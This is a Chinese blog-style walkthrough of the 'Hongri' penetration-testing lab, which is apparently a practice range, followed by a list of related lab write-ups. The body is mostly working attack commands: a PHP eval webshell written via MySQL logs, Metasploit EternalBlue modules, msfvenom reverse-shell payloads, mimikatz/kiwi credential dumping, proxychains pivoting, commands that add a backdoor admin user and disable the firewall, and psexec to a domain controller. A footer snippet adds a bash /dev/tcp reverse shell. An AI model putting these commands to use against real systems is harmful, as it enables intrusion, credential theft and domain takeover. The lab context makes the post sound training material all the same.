红日靶场1

2023-12-23 09:00
文章标签 靶场 红日

本文主要是介绍红日靶场1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

信息收集

主机发现

在这里插入图片描述

端口扫描

开放了80,3306端口
在这里插入图片描述

目录扫描

发现了phpmyadmin,phpinfophp,beifen.rar
在这里插入图片描述

渗透过程

访问80端口是一个phpstudy探针,发现网站的绝对路径等信息在这里插入图片描述
在这里插入图片描述
发现没有可利用的功能点后,访问其他收集到的信息

Getshell

phpmyadmin进行Getshell

访问phpmyadmin
在这里插入图片描述
想着爆破一下账号密码,但是试了一下root/root居然登录进去了
使用into写入文件的前提是看secure_file_priv的状态

secure_file_priv是用来限制在那个目录下有读写权限的,再mysql 5.6.34版本后是默认NULL的,此mysql的版本为5.5.53并没有大于5.6.34

当它的值为NULL时,则表示不允许进行读写
当它的值为一个路径时(例如/tmp),则表示只能再/tmp目录下读写
当它没有值时,则表示没有限制

执行select @@secure_file_priv查看状态为null说明不能够通过这种方式写入shell
在这里插入图片描述
既然直接写行不通,尝试日志写shell,查看日志状态以及存储位置:

show global variables like '%general_%'

在这里插入图片描述
日志是关闭的,开启日志并且更改日志存储位置,尝试写一句话到shell

SET GLOBAL general_log = "ON"

将日志文件保存为php文件

SET GLOBAL general_log_file="C:/phpStudy/www/4.php"

在这里插入图片描述
利用一句话马

SELECT '<?php eval($_POST["cmd"]);?>';

使用蚁剑进行连接
在这里插入图片描述

文件上传进行Getshell

访问yxcms,主页直接给出后台地址和默认账号密码
在这里插入图片描述
admin/123456成功登录
在这里插入图片描述
寻找到,在前台模板中可以创建php文件,进行写入木马
在这里插入图片描述
这里并没有发现网站的绝对路径,但是前面我们收集到了一个beifen.rar文件,他是网站的源码,在源码中寻找前台模板中任意一个php文件的名字就可以找到绝对路径。

/yxcms/protected/apps/default/view/default/shell.php

在这里插入图片描述

MS17-010进行Getshell

使用永恒之蓝MS17-010
使用goby对目标网站进行扫描,扫描出来一个MS17-010永恒之蓝漏洞
加载MS17-010扫描模块开扫

use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 192.168.227.221
run

在这里插入图片描述

确认存在永恒之蓝漏洞
加载永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.227.221
run

在这里插入图片描述

后渗透

如果使用MS17-010进行getshell可以直接进行msf上线,但是如果用前两个方式getshell还需要进行上线msf
生成木马

msfvenom -p windows/meterpreter_reverse_tcp LHOST=kali的ip LPORT=1234 -f exe -o shell.exe

将木马使用蚁剑上传到目标主机

use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost kali的ip
set lport 1234
run

监听后执行以下shell.exe就可以在kali中看到会话反弹了

ps查看一下进程
在这里插入图片描述
进程迁移一班迁移到explorer.exe
在这里插入图片描述

migrate 3188

在这里插入图片描述
提权

getsystem

获取密码

方式一

查看hash密码

hashdump

在这里插入图片描述

方式二

使用hashdump输出的密码是hash值,或者载入kiwi模块直接获取所有密码
首先进行提权

getsystem

在这里插入图片描述
在这里插入图片描述

load kiwi

在这里插入图片描述

creds_all

在这里插入图片描述

方式三

kiwi_cmd可以调用mimikatz模块的所有功能

kiwi_cmd sekurlsa::logonpasswords

在这里插入图片描述

msf与cmd进行交互

execute -f cmd.exe -i -t

在这里插入图片描述

乱码用chcp 65001解决

上线cs

启动服务

./teamserver 192.168.227.16 1234

在这里插入图片描述
设置监听
在这里插入图片描述
生成后门文件
在这里插入图片描述
在这里插入图片描述
使用蚁剑上传后门文件
在这里插入图片描述
在这里插入图片描述
成功上线
执行sleep 0,要不回显时间较长
在这里插入图片描述

cs与msf联动

生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< Your IP> LPORT=< Your Port> -f exe > shell.exe

进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.227.16(kali的ip)
set lport 4567
run

在这里插入图片描述
通过蚁剑上传木马并运行
在这里插入图片描述
进行提权
在这里插入图片描述

内网信息收集

内网信息收集阶段
进入到主机的shell,chcp 65001解决乱码
在这里插入图片描述

route print #打印路由信息

在这里插入图片描述
可知192.168.52.0/2是内网网段

ipconfig /all

在这里插入图片描述
该域名为god.org

net view /domain #查询当前主机是否加入域,如果加入则列出域名

在这里插入图片描述

net view #查看与该计算机位于同一工作组或域中的所有计算机名

在这里插入图片描述

定位域控

net time /domain #同步域控服务器时间

![在这里插入图片描述](https://img-blog.csdnimg.cn/5a2b178a7b02404aa668402b0475086f.pn

横向渗透

使用 msf+proxychains 搭建socks4a隧道。
在之前监听到的shell中设置内网路由

run post/multi/manage/autoroute

查看路由

run autoroute -p

在这里插入图片描述
开启代理:

background

use auxiliary/server/socks_proxy

set SRVHOST 127.0.0.1(这里因为是本机可以写本地ip)

run

jobs

在这里插入图片描述
然后在 proxychains 的配置文件 /etc/proxychains.conf,添加本机的1080端口:

socks4 127.0.0.1 1080

在这里插入图片描述

然后执行命令时,前面加上 proxychains 即可。如:

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141

在这里插入图片描述
这里开放了445端口,看一下是否存在ms17-010

use auxiliary/admin/smb/ms17_010_command

set COMMAND net user

set RHOST 192.168.52.141

run

在这里插入图片描述
成功执行命令。接着我们来添加一个用户尝试远程登录一下。

还是使用上面的模块,依次执行下面命令

#添加用户
set command net user aaa qwer@1234 /add
run

#管理员权限
set command net localgroup administrators aaa /add
run
#开启3389端口
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
run
#关闭防火墙
set command netsh advfirewall set allprofiles state off
run #好像没有防火墙

在这里插入图片描述
远程登陆

proxychains rdesktop 192.168.52.141

登陆的是本机所以log on to选择root那个选项

打靶场的时候是可以远程登录的,但是写文章重新复现了一遍就登录不进来了,不知道为什么

域控渗透

先扫描端口

proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.138

在这里插入图片描述

再用上面的老方法 use auxiliary/admin/smb/ms17_010_command 发现可以执行,按照步骤添加新用户,用户可以创建成功,但是登录不进去,转战CS

使用smb beacon的方法,由一台已经拿到beacon的机器,抓取到密码

得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。

先执行 net view 发现一下域内主机
在这里插入图片描述
在这里发现域内主机
在这里插入图片描述
新建一个 Beacon SMB 监听器,名字随便
在这里插入图片描述
域管右键选择psexec
在这里插入图片描述
在这里插入图片描述
点击运行,成功上线域管,这里顺便把域成员也上线了。可以看到 ∞∞ 这个字符 ,这就是派生的SMB Beacon。
😭又是打靶场的时候操作成功,写文章的时候环境不知道怎么回事,但是思路是正确的

😁到此打靶全部完成,断断续续打了半个月,环境总是崩,就需要处理环境的问题,最终还是有一点点问题,有什么不对的地方欢迎提出。

这篇关于红日靶场1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/527471

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就